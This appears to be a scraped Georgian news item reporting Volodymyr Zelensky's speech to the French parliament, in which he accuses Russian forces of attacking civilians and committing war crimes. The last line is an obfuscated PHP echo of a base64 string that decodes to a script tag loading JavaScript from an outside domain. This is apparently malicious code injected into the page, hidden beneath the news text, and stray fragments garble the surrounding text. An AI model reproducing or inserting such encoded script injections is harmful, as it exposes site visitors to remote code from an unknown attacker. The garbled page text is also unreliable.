celsiusi
ავერსი შნაიდერი
უკრაინის პრეზიდენტმა ვოლოდიმირ ზელენსკიმ განაცხადა, რუსი დამპყრობლები არ ითვალისწინებენ სამხედრო დამნაშავის ცნებას და ახორციელებენ ტერორს უკრაინის მიწაზე. ამის შესახებ ზელენსკიმ საფრანგეთის პარლამენტის წინაშე გამოსვლისას განაცხადა.
 
მისი თქმით, ევროპას 80 წელია არ უნახავს ის, რაც ახლა ხდება უკრაინაში რუსეთის ქმედებების გამო და ყველა ფაქტი, რომელიც დანაშაულის შემცველია ხელმისაწვდომია მსოფლიო საზოგადოებისთვის.
 
„რუსი სამხედროები არ ასხვავებენ, რომელ ობიექტებს დაარტყან. ისინი ყველაფერს ანადგურებენ - საცხოვრებელ კვარტლებს, საავადმყოფოებს, სკოლებს, უნივერსიტეტებს, წვავენ საკვების, მედიკამენტების საწყობებს. ისინი არ ითვალისწინებენ ისეთ მცნებებს, როგორიცაა სამხედრო დანაშაული, ჟენევის კონვენციის ვალდებულებები. მათ უკრაინის მიწაზე მოიტანეს ტერორი, სახელმწიფო ტერორი. ქალებზე, რომლებსაც რუსი სამხედროები აუპატიურებენ დროებით ოკუპირებულ რაიონებში; დევნილებზე, რომლებსაც დამპყრობლები ხვრეტენ პირდაპირ ქუჩებში; ჟურნალისტებზე, რომლებსაც კლავენ რუსი სამხედროები, მოხუცებულებზე, რომლებმაც ჰოლოკოსტს გაუძლეს, ახლა კი იძულებული არიან ბომბსაფარს შეაფარონ თავი რუსეთის დარტყმების გამო“, - აღნიშნა ზელენსკიმ.
 
723
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");